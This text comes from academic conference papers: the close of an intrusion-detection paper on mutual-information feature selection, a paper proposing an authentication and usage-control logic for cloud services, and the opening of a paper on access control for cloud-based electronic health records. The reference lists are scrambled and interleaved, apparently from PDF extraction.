System            # Feature   DR      FPR
IDS + MIFSA       16          99.15   0.81
DMNB [21]         all         n/a     3.0
TUIDS [22]        all         98.88   1.12
HTTP-IDS [23]     13          99.03   1.0
Hybrid IDS [24]   all         99.10   1.2

Table 4 summarizes the results achieved by the proposed IDS and the CSV-ISVM proposed in [25]. The results in this table are based on the Kyoto 2006+ dataset. In general, it is clear that both detection models show continuous improvements in performance. However, from the very first iterations the results obtained by our IDS are better than those of CSV-ISVM. For example, the results achieved by IDS + MIFSA in the last iteration are 98.18% and 0.31% for the detection and false positive rate, respectively. In contrast, CSV-ISVM produces 90.15% and 2.31% for the final detection and false positive rate, respectively. The table also reports the training and testing time taken by both detection systems. Unlike CSV-ISVM, IDS + MIFSA takes much less time. This relates to the fact that IDS + MIFSA uses a feature selection step that decreases the number of features passed to the classifier.


Table 4. Comparison performance of classification on the Kyoto 2006+ dataset (the days 2007, Nov. 1, 2 and 3)
                      IDS + MIFSA                         CSV-ISVM [25]
Iteration count   DR      FPR    Train(s)  Test(s)    DR      FPR    Train(s)  Test(s)
1                 96.14   0.80   0.106     0.213      79.65   4.54   1.823     7.76
2                 97.83   0.51   0.213     0.286      84.72   4.03   3.463     10.363
3                 97.93   0.50   0.525     0.550      85.58   3.92   5.26      15.443
4                 97.98   0.49   1.040     1.023      86.08   3.80   9.662     19.532
5                 97.98   0.43   1.235     1.073      86.81   3.54   11.302    22.735
6                 97.99   0.41   1.228     1.633      87.24   3.33   13.593    25.887
7                 98.01   0.37   1.723     1.779      88.08   3.03   14.348    28.23
8                 98.03   0.33   2.392     2.572      88.10   3.01   17.475    31.615
9                 98.07   0.33   2.775     3.081      89.64   2.52   23.02     35.547
10                98.18   0.31   3.299     3.728      90.15   2.31   27.257    40.097

6 CONCLUSION
This paper has proposed a supervised feature selection algorithm, namely the Mutual-Information-based Feature Selection Algorithm (MIFSA). MIFSA is a modified version of MIFS and MMIFS. MIFSA eliminates the need for setting the redundancy parameter β required in MIFS and MMIFS. This is useful in practice, since there is no specific guideline for setting the best value for this parameter. The feasibility of MIFSA is evaluated in the case of intrusion detection by building an intrusion detection system using the features selected by our proposed MIFSA. The proposed IDS + MIFSA has been evaluated using three well-known intrusion detection datasets: KDD Cup 99, NSL-KDD and Kyoto 2006+. The performance of IDS + MIFSA on all datasets showed better classification performance in terms of classification accuracy, detection rate and false positive rate compared to existing detection systems.
Although the proposed MIFSA has produced encouraging results, it could be further improved by enhancing the search strategy. We will take this into consideration when optimizing our method in the future.
REFERENCES
[1] P. Louvieris, N. Clewley, X. Liu, Effects-based feature identification for network intrusion detection, Neurocomputing 121 (2013) 265-273.

[2] R. Battiti, Using mutual information for selecting features in supervised neural net learning, IEEE Transactions on Neural Networks 5 (4) (1994) 537-550.
[3] N. Kwak, C.-H. Choi, Input feature selection for classification problems, IEEE Transactions on Neural Networks 13 (1) (2002) 143-159.
[4] H. Peng, F. Long, C. Ding, Feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy, IEEE Transactions on Pattern Analysis and Machine Intelligence 27 (8) (2005) 1226-1238.
[5] P. A. Estevez, M. Tesmer, C. A. Perez, J. M. Zurada, Normalized mutual information feature selection, IEEE Transactions on Neural Networks 20 (2) (2009) 189-201.
[6] S. Cang, H. Yu, Mutual information based input feature selection for classification problems, Decision Support Systems 54 (1) (2012) 691-698.
[7] F. Amiri, M. Rezaei Yousefi, C. Lucas, A. Shakery, N. Yazdani, Mutual information-based feature selection for intrusion detection systems, Journal of Network and Computer Applications 34 (4) (2011) 1184-1199.
[8] M. Ambusaidi, X. He, P. Nanda, Z. Tan, Building an intrusion detection system using a filter-based feature selection algorithm, IEEE Transactions on Computers PP (99) (2016) 1-1.
[9] C. E. Shannon, A mathematical theory of communication, ACM SIGMOBILE Mobile Computing and Communications Review 5 (1) (2001) 3-55.


[10] T. M. Cover, J. A. Thomas, Elements of information theory, John Wiley & Sons, 2012.

works & Communications (NetCom), Vol. 131,


Springer, 2013, pp. 499507.

[11] A. M. Ambusaidi, X. He, Z. Tan, P. Nanda, L. F.


Lu, T. U. Nagar, A novel feature selection approach for intrusion detection data classification,
in: International Conference on Trust, Security
and Privacy in Computing and Communications,
IEEE, 2014, pp. 8289.

[21] M. Panda, A. Abraham, M. R. Patra, Discriminative multinomial naive bayes for network intrusion
detection, in: International Conference on Information Assurance and Security (IAS), IEEE, 2010,
pp. 510.

[12] S. J. Stolfo, W. Fan, W. Lee, A. Prodromidis, P. K.


Chan, Cost-based modeling for fraud and intrusion detection: Results from the jam project, in:
DARPA Information Survivability Conference and
Exposition, Vol. 2, IEEE, 2000, pp. 130144.
[13] M. Tavallaee, E. Bagheri, W. Lu, A.-A. Ghorbani,
A detailed analysis of the kdd cup 99 data set, in:
Proceedings of the Second IEEE Symposium on
Computational Intelligence for Security and Defence Applications, 2009, pp. 16.
[14] J. Song, H. Takakura, Y. Okabe, M. Eto, D. Inoue,
K. Nakao, Statistical analysis of honeypot data and
building of kyoto 2006+ dataset for nids evaluation, in: Proceedings of the First Workshop on
Building Analysis Datasets and Gathering Experience Returns for Security, ACM, 2011, pp. 2936.

[22] P. Gogoi, M. H. Bhuyan, D. Bhattacharyya, J. K.


Kalita, Packet and flow based network intrusion
dataset, in: Contemporary Computing, Vol. 306,
Springer, 2012, pp. 322334.
[23] M. M. Abd-Eldayem, A proposed http service
based ids, Egyptian Informatics Journal 15 (1)
(2014) 1324.
[24] G. Kim, S. Lee, S. Kim, A novel hybrid intrusion detection method integrating anomaly detection with misuse detection, Expert Systems with
Applications 41 (4) (2014) 16901700.
[25] R. Chitrakar, C. Huang, Selection of candidate
support vectors in incremental svm for network intrusion detection, Computers & Security 45 (2014)
231241.

[15] C.-F. Tsai, Y.-F. Hsu, C.-Y. Lin, W.-Y. Lin, Intrusion detection by machine learning: A review,
Expert Systems with Applications 36 (10) (2009)
1199412000.
[16] S. Mukkamala, A. H. Sung, Significant feature selection using computational intelligent techniques
for intrusion detection, in: Advanced Methods
for Knowledge Discovery from Complex Data,
Springer, 2005, pp. 285306.
[17] S. Mukkamala, A. H. Sung, A. Abraham, Intrusion detection using an ensemble of intelligent
paradigms, Journal of network and computer applications 28 (2) (2005) 167182.
[18] S. Chebrolu, A. Abraham, J. P. Thomas, Feature
deduction and ensemble design of intrusion detection systems, Computers & Security 24 (4) (2005)
295307.
[19] Y. Chen, A. Abraham, B. Yang, Feature selection
and classification flexible neural tree, Neurocomputing 70 (1) (2006) 305313.
[20] A. Chandrasekhar, K. Raghuveer, An effective
technique for intrusion detection using neurofuzzy and radial svm classifier, in: Computer Net-


Cloud Authentication Logic on Data Security


Maryam Shahpasand1, Muhammad Ehsan Rana1, Ramlan Mahmod2, Nur Izura Udzir2
1Asia Pacific University of Technology & Innovation (APU), 2Universiti Putra Malaysia (UPM)
[email protected], [email protected], {ramlan, izura}@upm.edu.my

ABSTRACT
Cloud computing provides dynamic capacity and
capabilities, and it imparts resources as services
over the Internet. In cloud computing, information is migrated to third parties, which poses enormous security challenges such as privacy leakage and illegal access. This paper presents an authentication logic to protect data from illegal access before and during usage in cloud computing. The proposed authentication logic can be modified and adapted to different requirements in various types of cloud computing services; this is achieved by changing the formulas through the assignment of new parameters, which yields a flexible and reusable authentication model. Decision making is performed by four functions. The authentication and requirement functions control the access request before the usage, while the authorization and obligation functions are executed during the usage based on right requests. The implementation demonstrates the theoretical result of the proposed model.

KEYWORDS
Authentication, Authorization, Cloud computing,
Data Security, Formal Method.

1 INTRODUCTION
In recent years, the cloud computing environment has grown fast without requiring new infrastructure, new software licences or the training of personnel. Cloud computing delivers services to end users in three layers, as shown in Figure 1. They include [1]:

Figure 1. Cloud Computing layers [1]

Client: computer hardware or software that uses the developed application.
SaaS (software as a service): applications are run by users remotely over the Internet, so they do not need to install and run the applications on their own computers.
PaaS (platform as a service): it provides computing resources as a service, such as Internet access.
IaaS (infrastructure as a service): it delivers computer infrastructure; the services consist of a specific application and operating system.
Servers: the physical servers where the data are stored.
Although each layer has its own security issues, the benefits of the SaaS layer for customers lead us to focus on security issues, specifically privacy and illegal access, in this layer. SaaS brings cost reduction and operational efficiency improvement for clients, but on the other hand the security and storage of data remain unclear, which raises vast security concerns [2].
A great deal of information is migrated to third parties, and this poses enormous security challenges in


cloud computing. Privacy leakage and illegal


access arise while sensitive data are shared on
cloud servers by user outsourcing. Based on a
survey of security issues of cloud computing
[3], the threats in this environment consist of:
accessibility vulnerabilities, virtualization
vulnerabilities, web application vulnerabilities
such as SQL (Structured Query Language)
injection and cross-site scripting, physical
access issues, privacy and control issues arising
from third parties having physical control of
data, issues related to identity and credential
management, issues related to data verification,
tampering, integrity, confidentiality, data loss
and theft, issues related to authentication of the
respondent device or devices and IP spoofing.
Several approaches have been developed to keep data confidential against unauthorized users. Despite the current solutions, the heavy computational overhead of cryptographic methods and the lack of authorization during usage still persist.
This paper is organized as follows: Section 2
presents related works of security of cloud
computing, while Section 3 introduces a brief
overview of usage control. Section 4 describes
usage decision models for cloud computing,
including the authentication and Requirement
functions for controlling access at login time,
Authorization and Obligation functions for
controlling access during the usage. Finally,
Section 5 concludes the paper and outlines our
future work.
2 Related Works
Cloud computing is a style of computing that is scalable in capacity and capabilities. The idea of cloud computing emerged in the 1990s [4], and this environment provides resources as services over the Internet [5]. The security of the cloud has been considered by several researchers, who defined standards and security solutions for this environment, but cloud security issues are still the main concern of users and providers. Clients' data are stored at the SaaS provider's data center and are migrated during the data lifetime [6]. Therefore, data security concerns both the client and the SaaS provider. Moreover, data availability and duplication make the data location ambiguous. Consequently, they cause enormous security challenges in data privacy and access control at the SaaS layer.
One of the major features of cloud computing is multi-tenancy. SaaS applications provide the capability of storing data from multiple users. Data of various users reside at the same location, whether at the physical level or the application level [7]. Cloud providers must ensure data segregation and data safety for customers and prevent common threats in this area, such as injection, writing masked code and hacking via loopholes. Indeed, this can be achieved by an access control model that specifies the authorized users for any data request. Raj proposed a resource isolation model for data security during processing; it isolates the processor caches in virtual machines [8], but it cannot cover all virtualization requirements in the cloud. Existing cloud vendors control data access by fine-grained authorization, and they provide data security by strong encryption techniques for the communications in the cloud [3]. Furthermore, backup data are encrypted by strong schemes to protect sensitive data from leakage. Although encryption, as the current solution, reduces data tampering, it brings a heavy computation overhead to the cloud. Vendors' administrators have been motivated to find a method to protect data anywhere and anytime with light computation.
Privacy breaches and unauthorized access are further cloud issues, which are caused by the lack of strong authentication for cloud users. The storage of data in multiple locations is the main reason for these issues [9]. In cloud computing, there are several legal locations for specific information at the same time [3]. Enormous amounts of information can be accessed by SaaS providers' employees, and they can expose information to the public with a single incident [10]. Furthermore, information can be purged or saved for some unknown reason [11], and confidentiality can be affected by the location of information in the cloud. Roughly speaking, the widespread usage of cloud computing services - in various areas like education systems, health and medical centers and data storage sites - highlights the need to strongly ensure confidentiality.
SaaS applications are developed over the Internet, so the security issues of web applications affect them and increase SaaS application vulnerability [12]. Indeed, SaaS security challenges are the same as those of web applications. The Open Web Application Security Project (OWASP) has identified the top ten security risks faced by web applications [13]. SQL injection is the first attack in the OWASP list, and web applications are more vulnerable to SQL injection than to other attacks.
In addition, standard frameworks are needed to clarify the security architecture, and they could reduce the security challenges in web application development. Although organizations impose their own architectures based on their budgets, relevant research was carried out by Tsai in 2009 [14], which defines a standard security architecture to solve part of the security issues in this area.
The most important security issues in cloud computing are related to virtualization, one of the main components of a cloud. In the virtual environment of the cloud, malicious users break security restrictions, gain permissions and exploit software.
The ambiguity of data location and multi-tenancy necessitate that the SaaS vendor protect clients' private data from illegal access by malicious users. Therefore, the management of integrated and complex access control policies is one of the critical issues in cloud computing. This paper presents an overview of usage control and then proposes a decision model to prevent unauthorized access not only at the access point but also during usage in cloud computing. The model is placed in the cloud architecture and, finally, the formal statements and the algorithm are introduced.
3 Authentication and Authorization


In traditional models, access control systems evaluated resource access at login time. Right granting was defined by the system upon successful authentication and did not change during the usage [15]. New security issues have come up with the evolution of computer systems, and traditional access control models could not address them adequately. In the recent decade, research in the access control area has led to the usage control concept. The new concept became the next generation of access control systems and generalized them [16].
The UCON model introduced usage control for the first time in 2002 [17], and its authors presented a four-layer model called the OM-AM engineering framework in 2003 [18]. The presented model was extended in 2004 with the addition of ongoing usage [19]. The usage control concept includes traditional access control, privacy management, digital rights management, and trust management [20, 21]. Moreover, it represents object rights for these concepts [22]. The relationship between access control and usage control is shown in Figure 2.

Figure 2. Access and Usage Control Definition [22]

The main decision factors of a usage control system consist of authentication, obligation and condition [20, 21]. Resource access permissions are granted to users based on these factors. Usage control requirements are defined by a formal specification language in two aspects, including usage restrictions and essential actions [23]. The transfer of permissions between users is presented in the delegation concept for usage control systems [24-26]. The control mechanism features that are essential for usage control areas were determined in 2007 [27].
A comprehensive access control system can be broken by conflicts and leakages of security policies [28-30]. Attribute classification was investigated to solve policy conflicts [31]. Various


business processes are developed in a single cloud, and different organizations use integrated policies through resource sharing. Therefore, a flexible model must be present to provide policy incorporation and integration in the cloud. Moreover, organizations or cloud providers have their own types of security policy definitions, and the model should be independent of the definition type.
4 AUTHENTICATION LOGIC
In this section, usage decision models will be discussed for a usage control system in a cloud computing environment. Usage permission is checked before (pre) and during (ongoing) access based on the attributes of the subject, the object and the object rights. A decision is made according to four decision-making functions: Usage Decision Authentication (Ae), Usage Decision Authorization (Ao), Requirement (Re) and Obligation (Ob). We now describe the formalization of the usage decision model.
In this model, we use these elements:
Subject (Sub): In the proposed model, there is a set of object right requesters, and each member is named a subject. A subject holds the rights and executes the actions that are granted by the rights. Subjects are defined by their attributes. A subject in the cloud includes the client software and hardware through which cloud services are delivered; cloud computing would be useless without it. Subject == {Subi | i = 1, ..., n}
Subject Attribute (ATT(Sub)): Subject attributes include all the abilities and features that define the unique subject, such as id, role and name. They can be used by the usage decision system.
Object (Obj): An object is a member of the resource set that a subject can access. An object can act as a subject and can issue a right request for another object right. Also, in the proposed system there are some derivative objects. A derivative object is a side effect of the creation of another object, such as log and history files. Object == {Objj | j = 1, ..., n}
Object Attribute (ATT(Obj)): Object attributes are object properties and can be used in the usage decision process. There are some common object attributes, such as id and name, and they can be updated by the system administrator. Policies define the attribute update time; it may be done before, during or after access. Specific object attributes depend on the object type. For example, some attributes of an image are different from those of a video.
Object Right (ObjR): An object right is a member of the object usage permission set. A subject can exploit an object right, and the permissions are defined by the usage decision system.
Initial Object Right (IObjR): The simplest right of an object, which is necessary as a prerequisite of other object rights.
4.1 Authentication Function

The Authentication function (Ae) authenticates the subject before the access. It has the following elements: Sub, ATT(Sub), Obj, ATT(Obj), IObjR, and a Boolean function Ae. The Authentication function checks whether Sub can access the objects or not. For example, the user sends a login request to the server, and the login process will be successful if the user is authenticated. Privacy rights are exceptions in this function.


Ae(ATT(Sub), ATT(Obj), IObjR) => Permitted Access(Sub, Obj)    (1)

Figure 3. Ae Function

Here P => Q means P is a necessary condition for Q. The predicate shows that a subject that holds the initial object right can be granted access permission if Ae for Sub is true.
4.2 Authorization Function
The Authorization function (Ao) authorizes the subject during the access. It has the following elements: Sub, ATT(Sub), Obj, ATT(Obj), ObjR and a Boolean function Ao. The right permission is examined by Ao during the usage. For example, suppose a user is reading a web page after a successful login process. During the usage of the web page, the user's authorization is checked, and the access will be terminated if the administrator cancels the permission of Sub. Privacy rights are an exception to this function.

Permitted Access(Sub, Obj) => true    (2)

(2) is a prerequisite of Authorization on Obj for Sub.

Access Terminated(Sub, Obj) => ¬(Ae(ATT(Sub), ATT(Obj), IObjR))    (3)

Ao(ATT(Sub), ATT(Obj), ObjR) => Permitted Right Request(Sub, Obj, ObjR)    (4)

Figure 4. Ao Function

Ao is checked for continued access based on events or periodically. If the attributes are not satisfied, then the access will be terminated.
4.3 Requirement Function
The Requirement function (Re) defines all prerequisite actions of a right, and they have to be checked before and during the access. The Re function examines obligation fulfillment before access; this is named pre-obligation. An example of Re is starting an online business. The prerequisites include: filling up the membership form, signing of the e-commerce license by the user, and acceptance of the license by the website administrator. The Re function has the following components: Sub, ATT(Sub), Obj, ATT(Obj) and a Boolean function Re. Re checks whether the obligations are fulfilled before access or not.
Re decision function:

Subject Requirement ∧ Object Requirement -> {True, False}    (5)

Re(Sub, Obj) => Permitted Access(Sub, Obj)    (6)

Figure 5. Re Function


The Re function sometimes operates on different objects and can be performed by other subjects. All requirements have to be true before the Subject accesses the Object.
4.4 Obligation Function
Access will be terminated if the subject obligations are not fulfilled during the usage. Obligations are fulfilled during the usage after specific events or periodically, with a time period defined by the administrator. As an example, e-banking needs user authorization and communication every 30 seconds on the client side; thus, the obligations have to be fulfilled by the user in every 30-second time period. The Obligation function (Ob) has the following components: Sub, ATT(Sub), Obj, ATT(Obj), ObjR and Ob as a Boolean function. Ob checks obligation fulfillment during the usage.
Ob function:

Subject Obligation ∧ Object Obligation ∧ Object Right Obligation -> {True, False}    (7)

Permitted Access(Sub, Obj) => true    (8)

If Re fails, then no further verification is needed.

Access Terminated(Sub, Obj) => ¬(Re(Sub, Obj))    (9)

Ob(Sub, Obj, ObjR) => Permitted Right Request(Sub, Obj, ObjR)    (10)

Figure 6. Ob Function

Request: Usage Request (Sub, Obj, ObjR)
Response: Permission.xml
Authentication Logic:


The above four functions are combined into the final Authentication Logic shown in Figure 7.

Request: Usage Request (Sub, Obj, ObjR)
Response: Permission.xml
Authentication Logic:

// Ae Function
(1) If (Ae (ATT(Sub), ATT(Obj), IObjR) = False)
        // Subject authentication is not successful.
        a. Access Terminate
(2) End if
// Ao (checked based on events or periodically)
(3) If (Ae (ATT(Sub), ATT(Obj), IObjR) = False)
        // Subject authentication is not successful.
        a. Access Terminate
(4) Else
        a. If (Ao (ATT(Sub), ATT(Obj), ObjR) = False)
               // Subject authorization is not successful.
               i. Right Request Terminate
        b. End if
(5) End if
// Re Function
(6) If (Re (Sub, Obj) = False)
        // Requirement is not fulfilled.
        a. Access Terminate
(7) End if
// Ob (checked based on events or periodically)
(8) If (Re (Sub, Obj) = False)
        // Requirement is not fulfilled.
        a. Access Terminate
(9) Else
        a. If (Ob (Sub, Obj, ObjR) = False)
               // Obligation is not fulfilled.
               i. Right Request Terminate
        b. End if
(10) End if
Right request permit

Figure 7. Cloud Computing Authentication Logic
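A compact Python sketch of the listing above, given here purely for illustration: Ae, Ao, Re and Ob are assumed to be supplied as Boolean callables over the subjects, objects, attributes and rights defined in Sections 2.1-2.4, and the function and variable names are hypothetical.

def initial_decision(Ae, Re, sub, obj, iobj_right):
    # Steps (1)-(2) and (6)-(7): authentication and prerequisite check
    # before the usage starts.
    if not Ae(sub, obj, iobj_right):
        return "access terminated"
    if not Re(sub, obj):
        return "access terminated"
    return "access permitted"

def ongoing_decision(Ae, Ao, Re, Ob, sub, obj, iobj_right, obj_right):
    # Steps (3)-(5) and (8)-(10): re-evaluated during the usage,
    # either on specific events or periodically.
    if not Ae(sub, obj, iobj_right) or not Re(sub, obj):
        return "access terminated"
    if not Ao(sub, obj, obj_right) or not Ob(sub, obj, obj_right):
        return "right request terminated"
    return "right request permitted"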


3 Conclusion and Future Work

Ambiguity of data location and multi-tenancy are the main features of cloud computing. They cause numerous data access issues, and several works have been developed to solve these problems. Previous works have been extended by our proposed model in the ongoing continuity for access control and defined with formal statements. The formal statements can be used in various types of cloud computing services, and the desired properties can be checked in all types of cloud. Indeed, the model can be modified and adapted to different needs by changing the formulas for each case through assigning new appropriate parameters.

Therefore, the objective of this work is to propose a reusable and flexible usage decision model. In this paper, we have proposed a new usage decision model for cloud computing at the SaaS layer. Data and services are protected from unauthorized access not only at login time but also during usage. We have analyzed the decision factors for a usage control system through four functions. The Authentication function controls access requests and the Requirement function checks the prerequisites before the usage. Furthermore, decision making during the usage is done based on the Authorization and Obligation functions. Right requests are considered by authorization, and obligation fulfillment is checked by obligation. Future work may include validating and applying the logic to real-world case studies in different cloud computing domains such as education systems and health and medical systems.

REFERENCES

[1]

B. Furht, "Cloud computing fundamentals,"


Handbook of Cloud Computing, pp. 3-19, 2010.

[2]

Jadhav, C. M., et al. "An Approach for Development


of Multitenant Application as SaaS Cloud."
International Journal of Computer Applications
106.14 (2014).

[3]

S. Subashini and V. Kavitha, "A survey on security


issues in service delivery models of cloud
computing," Journal of Network and Computer
Applications, vol. 34, pp. 1-11, 2011.

[4]

R. Smith, "Computing in the cloud," Research


Technology Management, vol. 52, p. 65, 2009.

[5]

J. Heiser, "What you need to know about cloud


computing security and compliance," Gartner,
Research, ID, 2009.

[6]

Tan, Chekfoung, Kecheng Liu, and Lily Sun. "A


design of evaluation method for SaaS in cloud
computing." Journal of Industrial Engineering and
Management 6.1 (2013): 50.

[7]

A. Jasti, P. Shah, R. Nagaraj, and R. Pendse,


"Security in multi-tenancy cloud," in Security
Technology (ICCST), 2010 IEEE International
Carnahan Conference on, 2010, pp. 35-41.

[8]

H. Raj, R. Nathuji, A. Singh, and P. England,


"Resource management for isolation enhanced cloud
services," in Proceedings of the 2009 ACM
workshop on Cloud computing security, 2009, pp.
77-84.

[9]

D. Zissis and D. Lekkas, "Addressing cloud


computing security issues," Future Generation
Computer Systems, vol. 28, pp. 583-592, 2012.


[10]

Tarigonda, Siva, A. Ganesh, and Srinivasulu Asadi.


"Providing Data Security in Cloud Computing using
Novel and Mixed Agent based Approach."
International Journal of Computer Applications
112.6 (2015).

[11]

Chhabra, Shruti, and Veer Sain Dixit. "Cloud


computing: State of the art and security issues."
ACM SIGSOFT Software Engineering Notes 40.2
(2015): 1-11.

[12]

M. Zalewski, "Browser security handbook," Google


Code, 2010.

[24]

Z. Zhang, L. Yang, Q. Pei, and J. Ma, "Research on


Usage Control model with delegation characteristics
based on OM-AM methodology," in Network and
Parallel Computing Workshops, 2007. NPC
Workshops. IFIP International Conference on, 2007,
pp. 238-243.

[25]

M. Sastry and R. Krishnan, "A new modeling


paradigm for dynamic authorization in multi-domain
systems," Computer Network Security, pp. 153-158,
2007.

[26]

X. Luo, Y. Yang, and Z. Hu, "Controllable


delegation
model
based
on
usage
and
trustworthiness," in Knowledge Acquisition and
Modeling, 2008. KAM '08. International Symposium
on, 2008, pp. 745-749.

[13]

D. Fox, "Open Web Application Security Project,"


Datenschutz und Datensicherheit-DuD, vol. 30, pp.
636-636, 2006.

[14]

W. T. Tsai, Z. Jin, and X. Bai, "Internetware


computing: issues and perspective," in Proceedings
of the First Asia-Pacific Symposium on
Internetware, 2009, p. 1.

[27]

A. Pretschner, M. Hilty, F. Schutz, C. Schaefer, and


T. Walter, "Usage control enforcement: Present and
future," Security & Privacy, IEEE, vol. 6, pp. 44-53,
2008.

[15]

S. De Capitani di Vimercati, S. Paraboschi, and P.


Samarati, "Access control: principles and solutions,"
Software: Practice and Experience, vol. 33, pp. 397421, 2003.

[28]

M. Blaze, J. Feigenbaum, J. Ioannidis, and A.


Keromytis, "The role of trust management in
distributed systems security," Secure Internet
Programming, pp. 185-210, 1999.

[16]

Ye, Xinfeng. "Privacy preserving and delegated


access control for cloud applications." Tsinghua
Science and Technology 21.1 (2016): 40-54.

[29]

K. D. Bowers, A. Juels, and A. Oprea, "HAIL: a high-availability and integrity layer for cloud storage," in Proceedings of the 16th ACM conference on Computer and communications security, 2009, pp. 187-198.

[17]

J. Park and R. Sandhu, "Towards usage control


models: beyond traditional access control," 2002, pp.
57-64.

[30]

K. Hamlen, M. Kantarcioglu, L. Khan, and B.


Thuraisingham, "Security issues for cloud
computing," International Journal of Information
Security and Privacy (IJISP), vol. 4, pp. 36-48, 2010.

[31]

Rajkumar, P. V., and Ravi Sandhu. "Safety


Decidability for Pre-Authorization Usage Control
with Finite Attribute Domains.", IEEE Transactions
on Dependable and Secure Computing, 2015.

[18]

J. Park, "Usage control: a unified framework for next


generation access control," George Mason
University, 2003.

[19]

J. Park and R. Sandhu, "The UCON ABC usage


control model," ACM Transactions on Information
and System Security (TISSEC), vol. 7, pp. 128-174,
2004.

[20]

A. Lazouski, F. Martinelli, and P. Mori, "Usage


control in computer security: A survey," Computer
Science Review, vol. 4, pp. 81-99, 2010.

[21]

Shahpasand, Maryam, et al. "Usage Decision Model


for Online Social Network." Advanced Computer
Science Applications and Technologies (ACSAT),
2012 International Conference on. IEEE, 2012.

[22]

Jun, Ma, et al. "EUCON: An Active Usage Control


Model." Energy Procedia 13 (2011): 1450-1457.

[23]

M. Hilty, A. Pretschner, C. Schaefer, and T. Walter,


"Enforcement for Usage Control: A System Model
and a Policy Language for Distributed Usage
Control," Technical Report I-ST-20, DoCoMo
EuroLabs2006.


Oprea, "HAIL: a
layer for cloud
the 16th ACM
communications


Privacy and Security Challenges in Cloud Based Electronic Health Record:


Towards Access Control Model
Micheal Kubbo1, Manoj Jayabalan2, Muhammad Ehsan Rana3
School of Computing, Asia Pacific University of Technology and Innovation
Technology Park Malaysia, Bukit Jalil - 57000 Kuala Lumpur, Malaysia
[email protected], [email protected], [email protected]

ABSTRACT
Over the years, data theft has been rampant in financial institutions; however, at present, medical data is in the spotlight. The healthcare industry is considered a potential target for hackers and cyber criminals seeking access to patients' data. Electronic Health Records (EHR) provide flexibility, timely access and interoperability of patient information, which is key in decision making by physicians and medical officers. With the advancement of
technology, cloud has been spotted as a solution for
healthcare practitioners to implement interconnected
EHR as it reduces cost and hassle of infrastructure
maintenance. Cloud platform allows data to be
replicated in different geographical locations and
retrieved and shared among various organizations in
a timely manner. The healthcare sector is facing a dilemma on how patients' information can be protected while it is being managed by cloud vendors. Several cloud-based EHRs apply cryptographic techniques to encrypt data at rest and in motion, and access control to eliminate unauthorized access. However, existing access control mechanisms in the cloud mainly focus on giving data access to physicians and other medical officers but overlook the privacy requirements of patients. This research discusses various access
control models, their merits, limitations, and roles to
promote privacy in cloud based solutions.

KEYWORDS
Access Control, Electronic Health Records, Privacy,
Security, Cloud Platform.


1 INTRODUCTION
Electronic Health Records (EHR) assist
healthcare organizations towards fast and better
delivery of services and treatment to patients [1]. According to a technology report, Malaysian healthcare industries are gradually adopting EHR technology; however, paper-based records are also still in use [2]. Paper-based records cannot be completely eliminated in healthcare, but their use can be reduced to a certain magnitude [3]. Due to advancements in technology, healthcare organizations have started to integrate several IT systems to facilitate interoperability; however, privacy still remains a very big concern for healthcare consumers [4].
Advancement in technology has opened avenues for the healthcare sector. Consequently, cloud computing has been recognized as a cost-effective technique for small healthcare providers because it removes the need for individually managed IT infrastructure, which attracts EHR to be deployed in the cloud and managed by cloud vendors [5]. A recent study highlights that 60 percent of independent physicians have resorted to adopting cloud-based EHR because the cost incurred in implementing a cloud-based EHR is profoundly low compared to a decentralized EHR system.


Some of the benefits identified in using cloud-based solutions include affordability, no contracts, availability, and interoperability, among others. However, since the cloud platform is driven by cloud vendors, healthcare organizations should devise a risk management program in the cloud to guarantee the security and privacy of the information [6]. Similarly, as the cloud is exposed to vulnerabilities, security controls, risk assessment programs, security requirements and practices should be adopted by healthcare providers to promote total visibility to EHR consumers. Data security and privacy carry a higher risk in the cloud, which leads to a dilemma for some healthcare organizations that wish to transfer their services to the cloud. Protecting patients' medical data is an utmost priority for any type of healthcare organization, ensuring the information is available only to authorized users. One primary way to secure data and leverage privacy in the cloud is through the use of an access control mechanism, since the highest percentage of security breaches are due to unauthorized access [5].

This research provides an overview of the various access control mechanisms available for EHR providers, and their strengths and weaknesses. Next, a discussion on privacy and security issues in EHR and the cloud is presented, limited to access control. Cryptography is an important factor which needs to be considered in cloud-based EHR. With respect to the cloud, access control models are further discussed.

According to an exploratory study conducted in the US regarding third-party access to medical records, it is argued that the government should at times be mandated to override patients' privacy policies and rules regarding disclosure of their medical records to third-party companies. This is because, in the case of a disease outbreak, the government is supposed to coordinate with research agencies to make sure that these issues are dealt with in the best possible way without affecting the privacy of patients, thus improving the quality of healthcare delivery [14].

2 PRIVACY AND SECURITY


CHALLENGES IN ELECTRONIC
HEALTH RECORD
Security of healthcare information commences with the protection of patients' personal medical records by guaranteeing that the privacy, confidentiality, and integrity of the EHR system are maintained at all times [12]. Technology advancement is more rapid than ever before; however, privacy concerns in EHR remain unclear to consumers as a result of prevailing breaches, thus lowering trust in the systems [4]. In this research, three categories of security challenges have been identified: human factors, law and ethics, and CIA protection.


2.1 Human Factors


According to a study of physicians conducted by KTH University research students in Sweden, it was identified that around 76% of them considered the human factor as the ultimate challenge in EHR implementation, whereas 53% had little or no interest in health IT [13]. Therefore, EHR systems have a higher probability of being successfully implemented if a usability study adapted to the healthcare environment is carried out beforehand. Secondly, sufficient training of staff on EHR usage and on patients' privacy requirements has to be addressed.
2.2 Law and Ethics

Although a number of rules and regulations at both the state and federal level have been established to protect patients' privacy, for instance HIPAA and the Health Information Technology for Economic and Clinical Health (HITECH) Act, which leverage the implementation of health IT infrastructure, the privacy preservation of patients' data is still questionable [15].


2.3 Confidentiality, Integrity and Availability (CIA) Protection

As healthcare organizations transform paper charts into computerized records through the use of EHR systems, security breaches will always be a concern, as they compromise the integrity and confidentiality of the health records [16]. As a result, generic requirements for EHR systems have been provided by international directives such as HIPAA and European Data Protection, which require EHR implementations to satisfy the CIA triad [17]. The definitions of CIA as EHR security requirements are given below [18].

2.3.1 Confidentiality
This refers to the ability to safeguard information in the EHR system so that it can only be accessed by authorized subjects. Typically, authorized subjects gain access based on predefined role-based privileges [10]. Therefore, no information about patients should be released without their consent unless otherwise stated by the privacy rule. Authorization is mainly carried out by a security mechanism called access control. It is a greater challenge for healthcare organizations since the medical data in a cloud-based EHR is stored in cloud vendor centers, which are usually distributed across several regions.

2.3.2 Integrity
